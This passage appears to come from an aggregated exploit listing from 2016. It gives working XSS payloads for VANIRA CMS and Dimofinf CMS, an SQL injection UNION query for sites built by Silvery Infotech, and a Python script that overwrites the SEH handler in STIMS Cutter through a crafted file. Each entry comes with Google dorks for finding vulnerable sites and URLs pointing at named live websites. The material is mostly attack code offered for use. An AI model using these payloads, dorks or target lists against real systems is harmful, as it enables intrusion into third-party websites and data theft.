    [4] ImmuniWeb - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
    [5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
    
    -----------------------------------------------------------------------------------------------
    
    Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

     

  19. ######################
    # Exploit Title : VANIRA CMS Cross Site Scripting
    # Exploit Author : Persian Hack Team
    # Vendor Homepage : http://tursweb.com/
    # Google Dork : "Web Design > Tursweb.com " lang=
    # Date: 2016/02/23
    # Version : 6
    ######################
    # PoC:
    # lang=[XSS]
    # Payload = '><img onerror=alert(1) src="asd">
    #
    # http://hncmed.ir/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
    # http://gceramas.ir/pdview.php?&lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
    # http://isatismodava.com/home.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
    # http://spadk9.com/shopcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
    # http://iransommer.com/productcat.php?lang=fa%22%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
    #
    ######################
    # Discovered by :
    # Mojtaba MobhaM (kazemimojtaba@live.com)
    # T3NZOG4N (t3nz0g4n@yahoo.com)
    # Homepage : persian-team.ir
    ###################### 

     

  20. 
    # Exploit Title: STIMS CUTTER OVERFLOW SEH OVERWRITE
    # Date: 19 Feb 2016
    # Exploit Author: Shantanu Khandelwal <shantanu561993@gmail.com> <ishitasailor@gmail.com>
    # Vendor Homepage: http://www.stimslabs.com/
    # Software Link: http://www.stimslabs.com/en/cutter/STIMSCutterEnSetup.exe
    # Version: 1.1.3.20
    # Tested on: Windows XP SP3
    # CVE : UNKNOWN
    # ==============HOW TO CRASH ==================
    #make the cutt file and open it in the STIMS Cutter application.
    #Click on Build Report
    #===========================================
    #Problems in exploitation
    #Unable to find suitable SEH pointer
    #
    
    
    #!/usr/bin/env python
    f=open("crash.cutt","w")
    
    payload = """<!--block:#solution-->
    [solution]
    name="""
    payload+="A"*8452
    payload +="BBBB" #SEH overwrite
    payload +=r"""CCCC
    desc=A
    time=0
    version=1
    file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
    time.created=131003117142810000
    app=1.1.3
    projects=1
    <!--#solution:block-->
    <!--block:A-->
    [properties]
    optimize=0
    level=0
    diversity=0
    status=0
    active=1
    remnants=0
    sort=0
    version=1
    desc=S
    comment=
    comment.active=0
    notes=
    notes.active=0
    material=A
    progress=100
    calculation=0D99FF12
    cost=222.000
    time.gone=0
    time.date=2016 Feb 18 23.29.14
    payload=2
    file=C:\Documents and Settings\IEUser\Desktop\ABC.cutt
    app=1.1.3
    
    [order.blanks]
    b001={ "uid": "908113387", "material": "A", "length": "222", "quantity":
    "1", "knife": "1", "indent": "11", "cost": "1.0", "comment": "1", "id":
    "1", "name": "a" }
    
    [order.pieces]
    p001={ "uid": "124270241", "material": "A", "length": "111", "quantity":
    "1", "label": "1", "comment": "1", "id": "1", "name": "a", "orphans": "0" }
    
    [layout.summary]
    summary={ "output": "112.000", "used.len": "222.000", "used": "1",
    "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1",
    "remnants": "0.000", "srest": "110.000", "cost": "222.000", "cost.ppu":
    "1.982", "brest": "110.0", "status": "", "type": "summary", "time.gone":
    "0", "time.date": "2016 Feb 18 23.29.14" }
    blank01={ "name": "a", "cost": "1.000000", "blank": "1", "used": "1",
    "pieces": "1", "cmu": "50.450", "waste": "49.550", "shifts": "1", "output":
    "112.000", "used.len": "222.000", "cost.sum": "222.000", "cost.ppu":
    "1.982", "remnants": "0.000" }
    
    [layout.cuttings]
    c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
    "shifts": "1", "output": "#1 1", "layout": "111" }
    
    [layout.cuttings.parts]
    c001={ "signature": "1#a1-", "copies": "1", "remains": "110", "blank": "1",
    "shifts": "1", "output": "#1 1", "layout": "111", "name": "1" }
    <!--A:block-->
    """
    
    f.write(payload)
    f.close()

     

  21. #####################
    # Exploit Title : 2016 Website Developed by Silvery Infotech sql injection
    # Exploit Author : Ashiyane Digital Security Team
    # Google Dork : "intext:Developed by Silvery Infotech" inurl:page.php?id=
    # Date: 20 Feb 2016
    # Tested On : Windows 10 , Kali linux
    #################################
    # Exploit And Demo:
    # Vulnerable PHP File = page.php
    # Vulnerable Parameter = id
    #
    # Attack Like :
    http://artlinkinteriors.com/page.php?id=-1%27%20and/**x**/@ghasem20:=concat_ws%280x3c62723e,@@version%29%20UNION%20SELECT%201,2,3,4,5,group_concat%280x3c62723e,table_name%29,7,8,9%20from%20information_schema.tables%20where%20table_schema=database%28%29--%20-
    ######################
    # discovered by : ghasem20
    # tnx : h_sqli.empire
    ######################

  22. 	
    
    Dimofinf CMS 3.0.0 Cross Site Scripting
    Published: 2016.02.18
    Credit: Persian Hack Team
    Risk: Low
    CWE: CWE-79
    CVE: N/A
    Local: No
    Remote: Yes
    Dork: "Powered by Dimofinf cms Version 3.0.0"
    
    
    
    ######################
    # Exploit Title : Dimofinf CMS 3.0.0 Cross Site Scripting
    # Exploit Author : Persian Hack Team
    # Vendor Homepage : http://www.dimofinf.net/index.php
    # Google Dork : "Powered by Dimofinf cms Version 3.0.0"
    # Date: 2016/02/17
    # Version = 3.0.0
    ######################
    # PoC:
    # Username: MobhaM" onmouseover=alert("MobhaM") bad="
    # Password : 0
    #
    # http://www.dawadmisms.net/dimcp/login.php
    # http://www.aswarzan.com/dimcp/login.php
    # http://drhananclinic.com.sa/dimcp/login.php
    # http://www.newsqassim.com/dimcp/login.php
    # http://www.sudaninet.net/dimcp/login.php
    #
    ######################
    # Discovered by :
    # Mojtaba MobhaM (kazemimojtaba@live.com)
    # T3NZOG4N (t3nz0g4n@yahoo.com)
    # Homepage : persian-team.ir
    ######################

     
